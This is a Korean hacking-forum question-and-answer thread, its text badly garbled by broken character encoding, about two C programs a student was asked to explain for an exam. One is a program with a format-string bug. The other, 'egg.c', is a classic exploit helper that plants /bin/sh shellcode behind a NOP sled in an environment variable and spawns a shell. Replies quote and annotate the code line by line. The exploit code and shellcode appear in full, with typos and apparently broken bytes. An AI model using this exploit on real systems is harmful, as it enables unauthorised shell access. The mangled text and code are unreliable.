½Ã½ºÅÛ ÇØÅ·

 1574, 10/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   bluesun2
   ¼Ò½º Çؼ®Á» ºÎŹµå¸³´Ï´Ù (¾ð¾î¸¦ ¹è¿îÀûÀ̾ø¾î¼­ ½ÃÇèÀε¥..)

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1451 [º¹»ç]


¹ö±×ÆÄÀÏ°ú ¿¡±×ÆÄÀÏ ¼Ò½ºÇؼ®Á» ºÎŹµå¸³´Ï´Ù

bugfile.c
#include <stdio.h>

main() {

int i =0;
char buf[ 64];
memset (buf, 0, 64);
read(0, buf, 64);
printf(buf);
}

egg.c (Àå¹®ÀÔ´Ï´Ù ¼ÕÀ¸·Î Ãļ­ ¿ÀŸ°¡ÀÖÀ»¼öµµ)

#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
"\x55\x89\xe5\xeb\x1f\x5e\x89\x76\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x00\xc9\xc3\x90/bin/sh";

unnsigned long get_esp (void) {

__asm__("movl %esp, %eax")

main (int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}

if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}

addr = get_esp() - offset;
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;

for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
system("/bin/bash");
}
  Hit : 3362     Date : 2010/12/13 05:49


    
¹Ùº¼ÀÌ À§¿¡²« °£´ÜÈ÷ ¹öÆÛ¸¦ 0À¸·Î ÃʱâÈ­ÇÑÈÄ, ÀÔ·ÂÀ» ¹Þ¾Æ¼­ ±×´ë·Î Ãâ·ÂÇÏ´Â ÇÁ·Î±×·¥À̳׿ä
Æ÷¸Ë ½ºÆ®¸µ ¹ö±×¹®Á¦Àΰ¡º¸³×¿ä

¹Ø¿¡²«
½©Äڵ带 ȯ°æº¯¼ö¿¡ ¿Ã·Á³õ°í ¶Ç ±× ȯ°æº¯¼öÀÇ ÁÖ¼Òµµ ȯ°æº¯¼ö¿¡ ¿Ã·Á³õ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù		 2010/12/17  
sweetick Áö±Ý ½Å±âÇÑ°Ç ¹è¿îÀûÀÌ ¾ø´Â°É ½ÃÇèÀ¸·Î ³»´Â Çб³°¡ ÀÖ´Ù´Â »ç½Ç. 2011/01/16  
rkdgh0112 ÀϹÝÀûÀÎ ½©ÄÚµå±äÇѵ¥..
ÀÌ°ÉÁøÂ¥ °¡¸£ÃÄÁÖÁöµµ¾Ê°í ½ÃÇè¿¡³»³ª¿ä		 2011/02/11  
rkdgh0112 ½©ÄÚµå °øºÎ´Â ¾ÈÇغôµ¥
±×³É Á¦ ³ª¸§´ë·ÎÀÇ Çؼ®À» º¸¿©µå¸±²¾¿ä
½¬¿î°Ç °Ç³Ê¶Ù°í ¾à°£ Çò°¥¸®´Ù ½ÍÀº°Å³ª Áß¿äÇÑ°Å

unnsigned long get_esp (void) { // get_esp ¶ó´Â À¯ÀúÇÔ¼öÀÇ Àü¿ª¼±¾ðÀÔ´Ï´Ù.

__asm__("movl %esp, %eax") //.. %esp¿¡ %eax°ªÀ» Áִ°ɷκ¸À̳׿ä

main (int argc, char *argv[]) { //¸ÞÀÎÇÔ¼öÀÇ ¿øÇü ¼±¾ð
char *buff, *ptr, *egg; // buff, ptr,egg º¯¼öµéÀÇ charÇü Æ÷ÀÎÅÍ ¼³Á¤
char ÇüÀ¸·Î ¼³Á¤ÇÏ´ÂÀÌÀ¯ = Æ÷ÀÎÅÍ´Â ¸Þ¸ð¸®Áּұ⶧¹®¿¡ 16Áø¼öÀÇ ¼ýÀÚ¿­°ú ¹®ÀÚ¿­·Î Ç¥ÇöµÈ´Ù.
long *addr_ptr, addr; // long ÇüÀÇ addr º¯¼ö¼±¾ð°ú ±×ÀÇ Æ÷ÀÎÅÍ ¼±¾ð
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; // offsetÀ̶ó´Â º¯¼ö¸¦ default·Î ¼³Á¤, bsize¶ó´Â º¯¼ö¸¦ default·Î ¼³Á¤
int i, eggsize=DEFAULT_EGG_SIZE; // i¶ó´Â º¯¼ö¼±¾ð°ú eggsize¼±¾ð µ¿½Ã¿¡ eggsize¸¦ default_egg_size·Î ÇÔ

¹Ø¿¡ÁÙ ÇϱâÀü¿¡,
if ¹®, else if, else¸ðµÎ ½ÇÇ๮ÀÌ ÇÑ°³ÀÏ°æ¿ì¿¡ Áß°ýÈ£¸¦ Á¦¿ÜÇÒ¼öÀÖÀ½
if (argc > 1) bsize = atoi (argv[ 1]);
if (argc > 2) offset = atoi (argv[ 2]);
if (argc > 3) eggsize = atoi (argv[ 3]);
if (!(buff = malloc(bsize))) {
printf ("can't allocate memory.\n");
exit (0);
}
Áï ÀÌ°Ç ÀÔ·ÂÇÑ ÀÎÀÚÀÇ °³¼ö°¡ °¢°¢ 1°³, 2°³, 3°³À϶§ ÀÇ »óȲµéÀ» ÁßøÇØ »ç¿ëÇÑ°ÍÀÔ´Ï´Ù.
°á±¹ ÀÔ·ÂÇÑ ÀÎÀÚÀÇ °³¼ö°¡ 1ÀÌ»óÀ̸é 2°³ÀÌ»óÀÎÁöº¸°í 3°³ÀÌ»óÀÎÁöºÁ¼­
¸¶Áö¸·¿¡ malloc(bsize)
Áï bsize¿¡ ÇÒ´çµÈ ¸Þ¸ð¸®½ºÅðú buffÀÇ °ªÀÌ °°Áö¾ÊÀ»°æ¿ì,
can't allocate momory ¶ó´Â ¿¡·¯¹®ÀÌ ¹ß»ýÇϵµ·Ï ÇسõÀº°ÍÀÌÁÒ.
±×¸®°í ÇÔ¼öÀdz¡¿¡¼± 0À»¹ÝȯÇÕ´Ï´Ù.

if (!(egg = malloc(eggsize))) {
printf("can't allocate memory.\n");
exit (0);
}
¶ÇÇÑ egg°¡ eggsize¿¡ ÇÒ´çµÈ ½ºÅÃ¸Þ¸ð¸®¿Í °°Áö¾ÊÀ¸¸é
À§ÀÇ ¿¡·¯¹®ÀÌ ¶Ç ³ª¿À±¸¿ä.

addr = get_esp() - offset;
printf("using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;


for (i = 0; i < bsize; i+=4)
*(addr_ptr++_ = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen (shellcode) - 1; i++)
* (ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[ i];
buff[bsize - 1] = '\0';
egg[ eggsize - 1] = '\0';
memcpy (egg, "EGG=", 4);
putenv (egg);
memcpy (buff, "RET=", 4);
putenv (buff);
system("/bin/bash");
}		 2011/02/11  
rkdgh0112 addr = get_esp() - offset
ºÎºÐºÎÅÍ´Â ³»ÀÏÀÛ¼ºÇÒ²¾¿ä..
¾ö¸¶°¡ ÀÚ¶ó°í ¼ºÈ­¿¡¿ä ¤»¤»..

Ʋ¸°°ÅÀÖÀ¸¸é ¹«Á¶°Ç ÁöÀûÇØÁֽñ¸¿ä


°á±¹ ÇÁ·Î±×·¥ÀÇ Á¾ÂøÁ¡Àº ½© ½ÇÇàÀÔ´Ï´Ù.		 2011/02/11  
1394   ¼­¹ö¸¦ ÇØÅ·ÇÒ ¶© Å͹̳ο¡ Á¢¼ÓÇؾ߸¸ Çϳª¿ä?[5]     supershop
 03/06 5368
1393   ¼­¹öÆÄÀÏ ¤Ð[3]     wjdqkr312
 07/03 3246
1392   ¼­¹öÀÇ ¾ÆÀÌÇǶû È£½ºÆ®³×ÀÓÀ» ¾Ë¾Ò´Âµ¥ ¾î¶»°Ô ´õ ÁøÇàÇØ¾ß Çϳª¿ä?[5]     kjs90
 03/31 3572
1391   ¼­¹öÀÇ Æ¯Á¤ µðÅØÅ丮¸¦..[2]     kjs327
 05/08 3244
1390   ¼­¹ö ¸¶´Ù ÅÚ³ÝÀº ´ÙÀÖ³ª¿ä?[3]     superio1999
 11/06 4049
1389   ¼­¹ö °ø°ÝÀÚ ¾ÆÀÌÇǸ¦ ¾Ë¾Æ³Â½À´Ï´Ù[11]     andud11
 05/07 4259
1388   ¼­¹ö ħÀÔ½Ã....[2]     jamesjjong
 05/27 3933
1387   ¼­¹ö ÇØÅ·Áú¹® ¤·¤µ¤·/[1]     keetaro
 06/01 3745
1386   ¼­¹ö Á¢¼Ó ¾ÆÀÌÇÇ »èÁ¦ÇÏ´Â ¹æ¹ýÁ» ¾Ë·ÁÁÖ¼¼¿ä~~     k201113
 02/16 2827
1385   ¼Ö¶ó¸®½º ½©Äڵ忡 ´ëÇؼ­ Áú¹®ÀÔ´Ï´Ù     binoopang
 02/03 3428
1384   ¼öÆÛ½ºÄµ4.0¿¡°üÇÑ ¾ÆÀÌÇǽºÄµ Áú¹®[1]     inho1214
 07/11 4921
1383   ¼öÆÛ½ºÄµ4.0¿¡ °üÇÏ¿© Áú¹®     inho1214
 07/11 3370
1382   ¼Ò½º°¡ ÀÖÀ¸¸é..     karinterpreter
 11/28 3975
1381   ¼Ò½ºÆÄÀÏ¿¡¼­ ½ÇÇàÆÄÀϱîÁö Áú¹®ÀÌ¿ä!!![1]     õÀçÇØÄ¿7
 11/08 3605
  ¼Ò½º Çؼ®Á» ºÎŹµå¸³´Ï´Ù (¾ð¾î¸¦ ¹è¿îÀûÀ̾ø¾î¼­ ½ÃÇèÀε¥..)[5]     bluesun2
 12/13 3361
1379   ¼ÒÄÏÇÁ·Î±×·¡¹Ö Áú¹®Á» ÇÒ²²¿ä~.~[3]     commio
 05/25 3226
1378   ¼ÒÇÁÆ®¿þ¾î(¶Ç´Â ¹ÙÀÌ·¯½º³ª ¿ú)À¸·Î Çϵå¿þ¾î¸¦ Á¶Á¾ÇÒ ¼ö ÀÖ³ª¿ä??[6]     jin1055
 07/10 3102
1377   ¼ÒÁßÇÑ µ¥ÀÌÅ͸¦ ã¾Æµå¸³´Ï´Ù!!!!!     datablue
 12/03 3050
1376   »ýÃʺ¸°¡ Áú¹®µå¸³´Ï´Ù... Ã¥°ü·Ã(ÇØÅ·,³×Æ®¿öÅ©)     changooni
 05/24 3415
1375   »ó´ë¹æip¾Ë¾Æ³»±âÁú¹®     hyunbum77
 09/07 5122
[1][2][3][4][5][6][7][8][9] 10 ..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org